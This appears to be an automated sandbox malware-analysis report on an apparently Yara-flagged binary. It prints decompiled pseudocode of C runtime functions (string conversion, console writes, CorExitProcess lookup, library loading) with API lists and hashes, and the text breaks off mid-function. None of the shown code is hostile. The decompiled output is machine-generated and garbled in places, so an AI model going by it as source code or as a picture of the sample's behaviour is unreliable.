                                                                    			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x920e2052
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                                                    0x004078d4
                                                                    0x004078d5
                                                                    0x004078d6
                                                                    0x004078dd
                                                                    0x004078e2
                                                                    0x004078e8
                                                                    0x004078ee
                                                                    0x004078f4
                                                                    0x004078f7
                                                                    0x004078f7
                                                                    0x004078fa
                                                                    0x004078fc
                                                                    0x004078fc
                                                                    0x004078fa
                                                                    0x004078fe
                                                                    0x00407903
                                                                    0x0040790a
                                                                    0x0040790d
                                                                    0x0040790d
                                                                    0x00407929
                                                                    0x0040792f
                                                                    0x00407934
                                                                    0x00407ac7
                                                                    0x00407ad2
                                                                    0x00407ada
                                                                    0x0040793a
                                                                    0x0040793a
                                                                    0x0040793d
                                                                    0x00407942
                                                                    0x00407946
                                                                    0x0040799a
                                                                    0x0040799a
                                                                    0x0040799c
                                                                    0x0040799e
                                                                    0x00407abc
                                                                    0x00407abc
                                                                    0x00407abe
                                                                    0x00407abf
                                                                    0x00407ac5
                                                                    0x00000000
                                                                    0x00407ac5
                                                                    0x004079af
                                                                    0x004079b5
                                                                    0x004079b7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079bd
                                                                    0x004079cf
                                                                    0x004079d4
                                                                    0x004079d8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079e5
                                                                    0x00407a1f
                                                                    0x00407a22
                                                                    0x00407a25
                                                                    0x00407a27
                                                                    0x00407a29
                                                                    0x00407a2b
                                                                    0x00407a77
                                                                    0x00407a77
                                                                    0x00407a79
                                                                    0x00407a79
                                                                    0x00407a7b
                                                                    0x00407ab5
                                                                    0x00407ab6
                                                                    0x00000000
                                                                    0x00407abb
                                                                    0x00407a8f
                                                                    0x00407a94
                                                                    0x00407a96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a9a
                                                                    0x00407a9b
                                                                    0x00407a9c
                                                                    0x00407a9f
                                                                    0x00407adb
                                                                    0x00407ade
                                                                    0x00407aa1
                                                                    0x00407aa1
                                                                    0x00407aa2
                                                                    0x00407aa2
                                                                    0x00407aaf
                                                                    0x00407ab1
                                                                    0x00407ab3
                                                                    0x00407ae4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407ab3
                                                                    0x00407a2d
                                                                    0x00407a30
                                                                    0x00407a32
                                                                    0x00407a34
                                                                    0x00407a36
                                                                    0x00407a39
                                                                    0x00407a3e
                                                                    0x00407a59
                                                                    0x00407a5b
                                                                    0x00407a65
                                                                    0x00407a67
                                                                    0x00407a68
                                                                    0x00407a6a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a6c
                                                                    0x00407a72
                                                                    0x00407a72
                                                                    0x00000000
                                                                    0x00407a72
                                                                    0x00407a40
                                                                    0x00407a42
                                                                    0x00407a46
                                                                    0x00407a4b
                                                                    0x00407a4d
                                                                    0x00407a4f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a51
                                                                    0x00000000
                                                                    0x00407a51
                                                                    0x004079e7
                                                                    0x004079ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004079f2
                                                                    0x004079f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a10
                                                                    0x00407a14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a1a
                                                                    0x0040794d
                                                                    0x0040794f
                                                                    0x00407951
                                                                    0x00407959
                                                                    0x00407978
                                                                    0x0040797a
                                                                    0x00407984
                                                                    0x00407986
                                                                    0x00407987
                                                                    0x00407989
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040798f
                                                                    0x00407995
                                                                    0x00407995
                                                                    0x00000000
                                                                    0x00407995
                                                                    0x0040795d
                                                                    0x00407961
                                                                    0x00407966
                                                                    0x0040796a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407970
                                                                    0x00000000
                                                                    0x00407970

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                    • __alloca_probe_16.LIBCMT ref: 00407961
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                    • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                    • __freea.LIBCMT ref: 00407AB6
                                                                      • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    • __freea.LIBCMT ref: 00407ABF
                                                                    • __freea.LIBCMT ref: 00407AE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3864826663-0
                                                                    • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                    • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                    • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                    • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x920e2052
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                                                    0x0040822b
                                                                    0x00408232
                                                                    0x00408235
                                                                    0x0040823d
                                                                    0x00408241
                                                                    0x0040824d
                                                                    0x00408250
                                                                    0x00408253
                                                                    0x0040825a
                                                                    0x00408262
                                                                    0x00408265
                                                                    0x0040826b
                                                                    0x00408271
                                                                    0x00408276
                                                                    0x00408278
                                                                    0x0040827b
                                                                    0x00408280
                                                                    0x0040828a
                                                                    0x00408291
                                                                    0x00408294
                                                                    0x0040829b
                                                                    0x004082a2
                                                                    0x004082ce
                                                                    0x004082f4
                                                                    0x004082f6
                                                                    0x00000000
                                                                    0x004082d0
                                                                    0x004082d3
                                                                    0x0040839a
                                                                    0x004083a6
                                                                    0x004083b1
                                                                    0x004083b6
                                                                    0x004082d9
                                                                    0x004082e0
                                                                    0x004082e5
                                                                    0x004082eb
                                                                    0x004082f1
                                                                    0x00000000
                                                                    0x004082f1
                                                                    0x004082eb
                                                                    0x004082d3
                                                                    0x004082a4
                                                                    0x004082a8
                                                                    0x004082ab
                                                                    0x004082b1
                                                                    0x004082b3
                                                                    0x004082b6
                                                                    0x004082ba
                                                                    0x004082f7
                                                                    0x004082fa
                                                                    0x004082fb
                                                                    0x00408300
                                                                    0x00408306
                                                                    0x0040830c
                                                                    0x0040831b
                                                                    0x00408321
                                                                    0x00408327
                                                                    0x0040832c
                                                                    0x00408348
                                                                    0x004083bb
                                                                    0x004083c1
                                                                    0x0040834a
                                                                    0x00408352
                                                                    0x0040835b
                                                                    0x00408361
                                                                    0x00000000
                                                                    0x00408363
                                                                    0x00408365
                                                                    0x00408368
                                                                    0x00408381
                                                                    0x00000000
                                                                    0x00408383
                                                                    0x00408387
                                                                    0x00408389
                                                                    0x0040838c
                                                                    0x00000000
                                                                    0x0040838c
                                                                    0x00408387
                                                                    0x00408381
                                                                    0x00408361
                                                                    0x0040835b
                                                                    0x00408348
                                                                    0x0040832c
                                                                    0x00408306
                                                                    0x00000000
                                                                    0x0040838f
                                                                    0x0040838f
                                                                    0x004083c3
                                                                    0x004083cd
                                                                    0x004083d5

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                    • __fassign.LIBCMT ref: 004082E0
                                                                    • __fassign.LIBCMT ref: 004082FB
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                    • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                    • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                    • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                    • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                    • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 27%
                                                                    			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x920e2052
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                                                                    0x00403639
                                                                    0x00403640
                                                                    0x00403643
                                                                    0x00403647
                                                                    0x00403652
                                                                    0x0040365a
                                                                    0x00403665
                                                                    0x0040366b
                                                                    0x0040366f
                                                                    0x00403676
                                                                    0x0040367c
                                                                    0x0040367c
                                                                    0x0040367e
                                                                    0x00403683
                                                                    0x00403688
                                                                    0x00403688
                                                                    0x00403693
                                                                    0x0040369b

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                    • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                    • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                    • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x920e2052
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                                                    0x004062c0
                                                                    0x004062c7
                                                                    0x004062ca
                                                                    0x004062d3
                                                                    0x004062d8
                                                                    0x004062dd
                                                                    0x004062e2
                                                                    0x004062e5
                                                                    0x004062e7
                                                                    0x004062e7
                                                                    0x004062ec
                                                                    0x00406305
                                                                    0x0040630b
                                                                    0x00406310
                                                                    0x004063af
                                                                    0x004063b3
                                                                    0x004063b8
                                                                    0x004063b8
                                                                    0x004063cc
                                                                    0x004063d4
                                                                    0x004063d4
                                                                    0x00406316
                                                                    0x00406319
                                                                    0x0040631e
                                                                    0x00406322
                                                                    0x0040636e
                                                                    0x00406370
                                                                    0x00406372
                                                                    0x00406377
                                                                    0x0040638e
                                                                    0x00406396
                                                                    0x004063a6
                                                                    0x004063a6
                                                                    0x00406396
                                                                    0x004063a8
                                                                    0x004063a9
                                                                    0x00000000
                                                                    0x004063ae
                                                                    0x00406324
                                                                    0x00406329
                                                                    0x0040632b
                                                                    0x0040632d
                                                                    0x0040632d
                                                                    0x00406335
                                                                    0x00406352
                                                                    0x0040635c
                                                                    0x00406361
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406363
                                                                    0x00406369
                                                                    0x00406369
                                                                    0x00000000
                                                                    0x00406369
                                                                    0x00406339
                                                                    0x0040633d
                                                                    0x00406342
                                                                    0x00406346
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406348
                                                                    0x00000000

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                    • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                    • __freea.LIBCMT ref: 004063A9
                                                                      • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                    • String ID:
                                                                    • API String ID: 313313983-0
                                                                    • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                    • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                    • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                    • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x577c78
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                                                                    0x00409be4
                                                                    0x00409bf1
                                                                    0x00409bf7
                                                                    0x00409bff
                                                                    0x00409c0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409c15
                                                                    0x00409c15
                                                                    0x00409c17
                                                                    0x00409c29
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409c2b
                                                                    0x00409c3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409c43
                                                                    0x00409c45
                                                                    0x00409c46
                                                                    0x00409c5e
                                                                    0x00409c65
                                                                    0x00000000
                                                                    0x00409c73
                                                                    0x00000000
                                                                    0x00409c6e
                                                                    0x00409bff
                                                                    0x00409bf3
                                                                    0x00409bf3
                                                                    0x00000000

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                                                                    • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                                                                    • __dosmaperr.LIBCMT ref: 00409C68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID: x|W
                                                                    • API String ID: 2583163307-3542487639
                                                                    • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                    • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                                                                    • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                    • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
